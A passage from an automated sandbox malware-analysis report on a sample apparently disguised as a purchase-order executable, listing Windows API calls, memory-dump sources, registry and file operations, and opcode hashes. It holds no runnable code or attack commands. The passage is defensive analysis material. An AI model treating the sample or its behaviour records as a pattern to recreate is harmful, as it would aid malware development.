                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritelstrlen
                                                              • String ID: 8
                                                              • API String ID: 1453599865-4194326291
                                                              • Opcode ID: 670ee7b5490c677f5f659b485134598271d45b614e600b4a2b45cb0bab07c41e
                                                              • Instruction ID: d62a850ae7ae8d252436c59f910a95d891cc4c78108d860f1a787b3ec39cc5b5
                                                              • Opcode Fuzzy Hash: 670ee7b5490c677f5f659b485134598271d45b614e600b4a2b45cb0bab07c41e
                                                              • Instruction Fuzzy Hash: 6A01B971A44204FFD700AFB09E89EAF7278EF51719F20043BB102B61D1C2BC4D41962D
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,382A4AEA,?,?,382A4A8A,?,382B2238,0000000C,382A4BBD,00000000,00000000), ref: 382A4B59
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 382A4B6C
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,382A4AEA,?,?,382A4A8A,?,382B2238,0000000C,382A4BBD,00000000,00000000,?,382A2082), ref: 382A4B8F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0d649e78b585c0fbf15243af425be94909e85c17afed9956c841b9f59226cea0
                                                              • Instruction ID: 84fbde3d70226211602759d271e08fa6130706b663f79b9f630826b681096367
                                                              • Opcode Fuzzy Hash: 0d649e78b585c0fbf15243af425be94909e85c17afed9956c841b9f59226cea0
                                                              • Instruction Fuzzy Hash: B7F049B5900208BFDB119FA0C84CFAEBFF9EF44355F4045A8F905A6150DF389A82CA90
                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                              • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                                • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID:
                                                              • API String ID: 1941528284-0
                                                              • Opcode ID: 9a76f258c171755f82fb3be27d8a42dc7cbb0b331fc04bebc01a9be84b2c0181
                                                              • Instruction ID: 76b650aa9cc6b75c6122964d1cb95a98820e0ebeeaa58c8a998697c6af8370a7
                                                              • Opcode Fuzzy Hash: 9a76f258c171755f82fb3be27d8a42dc7cbb0b331fc04bebc01a9be84b2c0181
                                                              • Instruction Fuzzy Hash: 6A41A371904509BACF117BB5CC45DAF36B9EF05368F20423BF421B21E1D73C8A419A6E
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 382A715C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 382A717F
                                                                • Part of subcall function 382A56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 382A5702
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 382A71A5
                                                              • _free.LIBCMT ref: 382A71B8
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 382A71C7
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 765065654fb44f3b5291fd2a9edef51f2db4802487589baa465bb74236373cd2
                                                              • Instruction ID: 713b60e048e2ae1f87b00275bfc689c6b681fa1d4d89dac4890e7c40cb759f14
                                                              • Opcode Fuzzy Hash: 765065654fb44f3b5291fd2a9edef51f2db4802487589baa465bb74236373cd2
                                                              • Instruction Fuzzy Hash: E20184B6601A167F23110AFA4C8CD7B6EEDDEC6BA4351012DBD44D7200EF688C0291B8
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Close$DeleteEnumOpen
                                                              • String ID:
                                                              • API String ID: 1912718029-0
                                                              • Opcode ID: 655caf0860b8898067121cc846cd92bce4ad13f55364dba073aaa87c58243772
                                                              • Instruction ID: 973325e0aa9a645a651b6ee30753ebbcc0ecd75d5609573519e3086a48bf95c6
                                                              • Opcode Fuzzy Hash: 655caf0860b8898067121cc846cd92bce4ad13f55364dba073aaa87c58243772
                                                              • Instruction Fuzzy Hash: 31113A71904008FEEF229F90DE89EAE3B79FB54348F104476FA05B11A0D3B59E51EA69
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000000,382A636D,382A5713,00000000,?,382A2249,?,?,382A1D66,00000000,?,?,00000000), ref: 382A5B7F
                                                              • _free.LIBCMT ref: 382A5BB4
                                                              • _free.LIBCMT ref: 382A5BDB
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 382A5BE8
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 382A5BF1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 0f4bdd317f1eb802bf2145a1311ad5bf75d55d2749f08bfae26137bed16c81d9
                                                              • Instruction ID: 338078124189c71a6ce2706672aa585b1b62b1fdb01689237c354d1751532a00
                                                              • Opcode Fuzzy Hash: 0f4bdd317f1eb802bf2145a1311ad5bf75d55d2749f08bfae26137bed16c81d9
                                                              • Instruction Fuzzy Hash: DF01F4FE155B02FFA2025AF45F88D1F3ABA9FC17B67510829F915B6145EE7CC8074160
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,382A10DF,?,?,?,00000000), ref: 382A1E9A
                                                              • lstrcatW.KERNEL32(?,?,?,382A10DF,?,?,?,00000000), ref: 382A1EAC
                                                              • lstrlenW.KERNEL32(?,?,382A10DF,?,?,?,00000000), ref: 382A1EB3
                                                              • lstrlenW.KERNEL32(?,?,382A10DF,?,?,?,00000000), ref: 382A1EC8
                                                              • lstrcatW.KERNEL32(?,382A10DF,?,382A10DF,?,?,?,00000000), ref: 382A1ED3
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat
                                                              • String ID:
                                                              • API String ID: 493641738-0
                                                              • Opcode ID: 0e5c6e77efcc0daac29087ed3e0d6ba290fdfa7e05e1436f2cc94c7d212e2ec3
                                                              • Instruction ID: 8dec2f426a2bee7d24769581dba6a8c10e51c8b93908243860f62651c0118f0b
                                                              • Opcode Fuzzy Hash: 0e5c6e77efcc0daac29087ed3e0d6ba290fdfa7e05e1436f2cc94c7d212e2ec3
                                                              • Instruction Fuzzy Hash: 7BF089261002107AD6212769ACC9E7F7B7CEFC5B74F84001DF90893190DF58585392B5
                                                              APIs
                                                              • _free.LIBCMT ref: 382A91D0
                                                                • Part of subcall function 382A571E: HeapFree.KERNEL32(00000000,00000000,?,382A924F,?,00000000,?,00000000,?,382A9276,?,00000007,?,?,382A7E5A,?), ref: 382A5734
                                                                • Part of subcall function 382A571E: GetLastError.KERNEL32(?,?,382A924F,?,00000000,?,00000000,?,382A9276,?,00000007,?,?,382A7E5A,?,?), ref: 382A5746
                                                              • _free.LIBCMT ref: 382A91E2
                                                              • _free.LIBCMT ref: 382A91F4
                                                              • _free.LIBCMT ref: 382A9206
                                                              • _free.LIBCMT ref: 382A9218
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 3af95b958ca17c6a13b39fa3e45686470607556e609e11bca39f2a6c21fc1ecf
                                                              • Instruction ID: d543ad67916cc4faa1cc30f86fb99401a0d028ec2b9ec77d8bdc0c6486aa509f
                                                              • Opcode Fuzzy Hash: 3af95b958ca17c6a13b39fa3e45686470607556e609e11bca39f2a6c21fc1ecf
                                                              • Instruction Fuzzy Hash: 39F01DB5555241BB8611DBEAEACDC1BBFE9FE407257E0080AF819E7504CF78F8C58A60
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                              • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                              • DeleteObject.GDI32(00000000), ref: 00401D36
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                              • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                              • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                              • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401D44
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                              • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID:
                                                              • API String ID: 3808545654-0
                                                              • Opcode ID: 3d10640cf75f264bc6b4d99a4bec16fe66d8b8c39a1604d1ba5a7bd99958a89c
                                                              • Instruction ID: 8995593179462595128303b368e9330df260c28bd2cead9704070f65c6b7920e
                                                              • Opcode Fuzzy Hash: 3d10640cf75f264bc6b4d99a4bec16fe66d8b8c39a1604d1ba5a7bd99958a89c
                                                              • Instruction Fuzzy Hash: 1F016D71948285EFEB416BB0AE0AFDABF74EB65305F144479F201B62E2C77C10058B6E
                                                              APIs
                                                              • _free.LIBCMT ref: 382A536F
                                                                • Part of subcall function 382A571E: HeapFree.KERNEL32(00000000,00000000,?,382A924F,?,00000000,?,00000000,?,382A9276,?,00000007,?,?,382A7E5A,?), ref: 382A5734
                                                                • Part of subcall function 382A571E: GetLastError.KERNEL32(?,?,382A924F,?,00000000,?,00000000,?,382A9276,?,00000007,?,?,382A7E5A,?,?), ref: 382A5746
                                                              • _free.LIBCMT ref: 382A5381
                                                              • _free.LIBCMT ref: 382A5394
                                                              • _free.LIBCMT ref: 382A53A5
                                                              • _free.LIBCMT ref: 382A53B6
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: c0c75afde5ab7936a35050af2a7dd85688a01bf977f9f5383ef6f523987a41c6
                                                              • Instruction ID: d4263ca4639a40bdb3444f335367119032c05b5daafce2ef10461c56813b6bb6
                                                              • Opcode Fuzzy Hash: c0c75afde5ab7936a35050af2a7dd85688a01bf977f9f5383ef6f523987a41c6
                                                              • Instruction Fuzzy Hash: 56F0D079C26125EF8A135FE8DA8C80A3FF1BB58750351010EF810B7264DFB945879B90
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe,00000104), ref: 382A4C1D
                                                              • _free.LIBCMT ref: 382A4CE8
                                                              • _free.LIBCMT ref: 382A4CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                              • API String ID: 2506810119-63056972
                                                              • Opcode ID: 772f692b7e5e82bd7cd272e69624a47dadb8ba5c6aaa8eacbccf1ca2e1801075
                                                              • Instruction ID: 7503f645b6b1039351c52136664a6da21a72812afe85651619efe836c91ac548
                                                              • Opcode Fuzzy Hash: 772f692b7e5e82bd7cd272e69624a47dadb8ba5c6aaa8eacbccf1ca2e1801075
                                                              • Instruction Fuzzy Hash: A7318379A00319EFDB12CB998984D9EBBFDEF84310B10405AE804A7240DFB9DB41CB50
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                              • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                              • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                              • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,382A6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 382A8731
                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 382A87BA
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 382A87CC
                                                              • __freea.LIBCMT ref: 382A87D5
                                                                • Part of subcall function 382A56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 382A5702
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: 349f0c13df8b19f8ab5fb1445de32429bdca010ff8824a937f040f2b19e35d25
                                                              • Instruction ID: 9ee5d4fa9f2b721ef9c7279abdc2db77c3219dff531dbfee6463a88a721c27fe
                                                              • Opcode Fuzzy Hash: 349f0c13df8b19f8ab5fb1445de32429bdca010ff8824a937f040f2b19e35d25
                                                              • Instruction Fuzzy Hash: 1E318D7AA1021AABDF158FB4CC84EAF7BA5EF44714F050128FC04EA190EF39D995CB90
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00403192
                                                                • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                              • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                              • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$Pointer$CountTickWrite
                                                              • String ID:
                                                              • API String ID: 2146148272-0
                                                              • Opcode ID: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                              • Instruction ID: 5e1569cfb0b545446f3df2febc41285ecf4c3109a81fe664ff5153a665b75745
                                                              • Opcode Fuzzy Hash: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                              • Instruction Fuzzy Hash: D9418B72504205DFDB109F29EE84AA63BADF74431671441BFE605B22E1C7B96D418BAC
                                                              APIs
                                                              • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                              • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                              • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateValuelstrlen
                                                              • String ID:
                                                              • API String ID: 1356686001-0
                                                              • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                              • Instruction ID: 66b2e8a9ee20b684f946803e70458d48747d67842d9f9fe70aa08e99181ad06b
                                                              • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                              • Instruction Fuzzy Hash: C3118EB1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D6B85D419A29
                                                              APIs
                                                                • Part of subcall function 00405A82: CharNextW.USER32(?,?,00424EF0,?,00405AF6,00424EF0,00424EF0,00436800,?,75572EE0,00405834,?,00436800,75572EE0,00434000), ref: 00405A90
                                                                • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405A95
                                                                • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405AAD
                                                              • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                              • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                              • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                              • String ID:
                                                              • API String ID: 3751793516-0
                                                              • Opcode ID: 0b24a768457497bf3eab191a7c20dd9ef2dcf7a171cde3cdfafed4ce3bf00be3
                                                              • Instruction ID: c154c5cc2fdcc817133e571beca98f96870035068e51bbb493f84d6d7086355a
